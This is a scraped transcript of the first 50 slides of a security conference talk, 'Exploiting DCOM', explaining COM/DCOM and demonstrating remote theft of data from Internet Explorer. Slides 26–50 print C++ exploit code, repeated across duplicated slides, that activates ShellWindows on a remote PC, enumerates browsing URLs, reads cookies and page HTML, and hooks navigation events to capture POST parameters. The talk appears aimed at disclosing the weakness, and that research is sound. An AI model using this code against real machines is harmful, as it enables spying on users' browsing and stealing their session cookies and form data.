1 / 86

Exploiting DCOM

Exploiting DCOM. Yoshiaki Komoriya Soap@securityfriday.com Hidenobu Seki Urity@securityfriday.com. Agenda. COM and DCOM technology IE exploit demonstration Exploit code Authentication MS-Word exploit demonstration DCOM exploit prevention. Agenda. COM and DCOM technology

ssproul
Download Presentation

Exploiting DCOM

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Exploiting DCOM Yoshiaki Komoriya Soap@securityfriday.com Hidenobu Seki Urity@securityfriday.com

  2. Agenda • COM and DCOM technology • IE exploit demonstration • Exploit code • Authentication • MS-Word exploit demonstration • DCOM exploit prevention

  3. Agenda • COM and DCOM technology • IE exploit demonstration • Exploit code • Authentication • MS-Word exploit demonstration • DCOM exploit prevention

  4. Distributed COM • Application-level protocol for object-oriented remote procedure call. • For constructing applications on distributed computing environment. • “DCOM is a seamless evolution of COM” according to Microsoft.

  5. COM technology • Components oriented programming model of Microsoft. • Can develop reusable programs by using COM.

  6. COM model COM components Client Program Component Interface

  7. Distributed apps by using DCOM Remote PC Local PC Client Program COM Component DCOM DCOM network

  8. DCOM model Local PC Remote PC DCOM Runtime DCOM Runtime DCOM Protocol COM component Client Program network

  9. DCOM runtime • Installed by default • Windows XP, 2k, (98, Me) • Not installed by default • Windows NT But installed with other apps (ex. IE)

  10. DCOMCNFG.exe • DCOM Configuration Tool • View installed DCOM-enable applications list.

  11. List of DCOM-enabled apps DCOM-enabled apps

  12. Windows Built-in DCOM Apps • Internet Explorer • Windows media player • Windows Scripting Host • Sound recorder • WordPad and more…

  13. Other Applications • Word • Excel • Outlook • PowerPoint and more…

  14. COM components on Windows • Windows has many COM components. • Registered under “\HKEY_CLASSES_ROOT\CLSID” on the registry.

  15. COM components in Registry

  16. Agenda • COM and DCOM technology • IE exploit demonstration • Exploit code • DCOM authentication • MS-Word exploit demonstration • DCOM exploit prevention

  17. IE’en • Original IE exploit tool • Steal IE’s data • Hijack IE • Can download from www.securityfriday.com

  18. IE’en • Browsing URLs • Browsing contents • and more.. Local PC Remote PC • Create new window • Change browsing page • and more… DCOM DCOM network

  19. Demonstration environment • Local PC • Windows XP • Remote PC • Windows 2k Professional ( Default )

  20. Agenda • COM and DCOM technology • IE exploit demonstration • Exploit code • Authentication • MS-Word exploit demonstration • DCOM exploit prevention

  21. Exploit code • Stealing IE’s data • Hijacking IE

  22. Exploit code • Stealing IE’s data • Hijacking IE

  23. Stealing IE’s data • Browsing URL lists • Incoming data • Cookies • HTML contents • Navigation events • Get parameters • Post Parameters

  24. Stealing IE’s data • Browsing URL lists • Incoming data • Cookies • HTML contents • Navigation events • Get parameters • Post Parameters

  25. Browsing URL list • Activate “ShellWindows” component on remote PC. • Get “IDispatch” intarfaces from “IShellWindows” interface. • Get “IWebBrowser2” interfaces from IDispatch interface. • Get browsing URL strings from IWebBrowser2.

  26. Activate ShellWindows // Initialize COM runtime HRESULT hret = CoInitialize(NULL); // Create COSERVERINFO structure contain remote PC IP COSERVERINFO ServerInfo; ServerInfo.dwReserved1 = 0; ServerInfo.dwReserved2 = 0; ServerInfo.pwszName = L"RemotePC"; ServerInfo.pAuthInfo = NULL; // Get a “IShellWindows” interface from remote PC MULTI_QI qi = {&IID_IShellWindows, NULL, 0}; hret = CoCreateInstanceEx(CLSID_ShellWindows, NULL, CLSCTX_SERVER, &ServerInfo, 1, &qi); IShellWindows *windows = (IShellWindows*)qi.pItf;

  27. Activate ShellWindows // Initialize COM runtime HRESULT hret = CoInitialize(NULL); // Create COSERVERINFO structure contain remote PC IP COSERVERINFO ServerInfo; ServerInfo.dwReserved1 = 0; ServerInfo.dwReserved2 = 0; ServerInfo.pwszName = L"RemotePC"; ServerInfo.pAuthInfo = NULL; // Get a “IShellWindows” interface from remote PC MULTI_QI qi = {&IID_IShellWindows, NULL, 0}; hret = CoCreateInstanceEx(CLSID_ShellWindows, NULL, CLSCTX_SERVER, &ServerInfo, 1, &qi); IShellWindows *windows = (IShellWindows*)qi.pItf;

  28. Activate ShellWindows // Initialize COM runtime HRESULT hret = CoInitialize(NULL); // Create COSERVERINFO structure contain remote PC IP COSERVERINFO ServerInfo; ServerInfo.dwReserved1 = 0; ServerInfo.dwReserved2 = 0; ServerInfo.pwszName = L"RemotePC"; ServerInfo.pAuthInfo = NULL; // Get a “IShellWindows” interface from remote PC MULTI_QI qi = {&IID_IShellWindows, NULL, 0}; hret = CoCreateInstanceEx(CLSID_ShellWindows, NULL, CLSCTX_SERVER, &ServerInfo, 1, &qi); IShellWindows *windows = (IShellWindows*)qi.pItf;

  29. Get IDispatch // Get num of IE window by using IShellWindows long nCount; hret = windows->get_Count(&nCount); for(long i = 0; i < nCount; ++i){ // Get IDispatch interfaces from IShellWindows IDispatch *disp = NULL; VARIANT va; VariantInit(&va); V_VT(&va) = VT_I4; V_I4(&va) = i; hret = windows->Item(va,&disp); VariantClear(&va);

  30. Get IDispatch // Get num of IE window by using IShellWindows long nCount; hret = windows->get_Count(&nCount); for(long i = 0; i < nCount; ++i){ // Get IDispatch interfaces from IShellWindows IDispatch *disp = NULL; VARIANT va; VariantInit(&va); V_VT(&va) = VT_I4; V_I4(&va) = i; hret = windows->Item(va,&disp); VariantClear(&va);

  31. Get IDispatch // Get num of IE window by using IShellWindows long nCount; hret = windows->get_Count(&nCount); for(long i = 0; i < nCount; ++i){ // Get IDispatch interfaces from IShellWindows IDispatch *disp = NULL; VARIANT va; VariantInit(&va); V_VT(&va) = VT_I4; V_I4(&va) = i; hret = windows->Item(va,&disp); VariantClear(&va);

  32. Get IWebBrowser2 // Get IWebBrowser2 interfaces from IDispatch IWebBrowser2 *browser = NULL; if(disp != NULL){ hret = disp->QueryInterface(IID_IWebBrowser2, (void**)&browser); }

  33. Get browsing URL strings // Get browsing URL string if(browser != NULL){ BSTR url; hret = browser->get_LocationName(&url); } }

  34. Stealing IE’s data • Browsing URL list • Incoming data • Cookie • HTML Contents • Navigation events • Get parameters • Post Parameters

  35. Incoming data • cookie • Get “IHTMLDocument2” interface from IWebBrowser2. • Call “get_cookie” method of IHTMLDocument2. • HTML • Get “IHTMLElement” interface from IHTMLDocument2. • Call “get_outerHTML” method of IHTMLElement.

  36. Get cookie // Get IHTMLDocument2 from IWebBrowser2 IDispatch *htmlDisp = NULL; hret = browser->get_Document(&htmlDisp); IHTMLDocument2 *doc = NULL; if(htmlDisp != NULL){ hret = htmlDisp->QueryInterface(IID_IHTMLDocument2, (void**)&doc); } // Call get_cookie method of IHTMLDocument2 if(theIHD != NULL){ BSTR cookie; hret = doc->get_cookie(&cookie); }

  37. Get cookie // Get IHTMLDocument2 from IWebBrowser2 IDispatch *htmlDisp = NULL; hret = browser->get_Document(&htmlDisp); IHTMLDocument2 *doc = NULL; if(htmlDisp != NULL){ hret = htmlDisp->QueryInterface(IID_IHTMLDocument2, (void**)&doc); } // Call get_cookie method of IHTMLDocument2 if(theIHD != NULL){ BSTR cookie; hret = doc->get_cookie(&cookie); }

  38. Get cookie // Get IHTMLDocument2 from IWebBrowser2 IDispatch *htmlDisp = NULL; hret = browser->get_Document(&htmlDisp); IHTMLDocument2 *doc = NULL; if(htmlDisp != NULL){ hret = htmlDisp->QueryInterface(IID_IHTMLDocument2, (void**)&doc); } // Call get_cookie method of IHTMLDocument2 if(theIHD != NULL){ BSTR cookie; hret = doc->get_cookie(&cookie); }

  39. Get HTML // Get IHTMLElement from IHTMLDocument2 IHTMLElement *element = NULL; hret = doc->get_body(&element); // Call get_outerHTML of IHTMLElement if(element != NULL){ BSTR html; hret = element->get_outerHTML(&html); }

  40. Get HTML // Get IHTMLElement from IHTMLDocument2 IHTMLElement *element = NULL; hret = doc->get_body(&element); // Call get_outerHTML of IHTMLElement if(element != NULL){ BSTR html; hret = element->get_outerHTML(&html); }

  41. Get HTML // Get IHTMLElement from IHTMLDocument2 IHTMLElement *element = NULL; hret = doc->get_body(&element); // Call get_outerHTML of IHTMLElement if(element != NULL){ BSTR html; hret = element->get_outerHTML(&html); }

  42. Stealing IE’s data • Browsing URL list • Incoming data • Cookie • HTML Contents • Navigation events • Get parameters • Post Parameters

  43. Navigation events Client Program Event Handler IE Navigation Events

  44. Navigation events • Create event handler implementing “DWebBrowserEvents” interface. • Get “IConnectionPoint” interface through IWebBrowser2. • Advise IE where the event handler is by using IConnectionPoint.

  45. Members of DWebBrowserEvents

  46. BeforeNavigate void BeforeNavigate( IDispatch* pDisp, VARIANT* &url, // the new URL to be navigate to VARIANT* &Flag, VARIANT* &TargetFrameName, VARIANT* &PostData, // the POST data to send to the new URL VARIANT* &Headers, VARIANT_BOOL* &Cancel );

  47. BeforeNavigate void BeforeNavigate( IDispatch* pDisp, VARIANT* &url, // the new URL to be navigate to VARIANT* &Flag, VARIANT* &TargetFrameName, VARIANT* &PostData, // the POST data to send to the new URL VARIANT* &Headers, VARIANT_BOOL* &Cancel );

  48. BeforeNavigate void BeforeNavigate( IDispatch* pDisp, VARIANT* &url, // the new URL to be navigate to VARIANT* &Flag, VARIANT* &TargetFrameName, VARIANT* &PostData, // the POST data to send to the new URL VARIANT* &Headers, VARIANT_BOOL* &Cancel );

  49. Get IConnectionPoint IConnectionPointContainer* container; hret = browse->QueryInterface( IID_IConnectionPointContainer, (void**)&container); IConnectionPoint* point; hret = container->FindConnectionPoint( IID_DWebBrowserEvents, &point);

  50. Advise IE Sink *sink = new Sink; DWORD dwCookie; hret = point->Advise(sink->GetIDispatch(false), &dwCookie);

More Related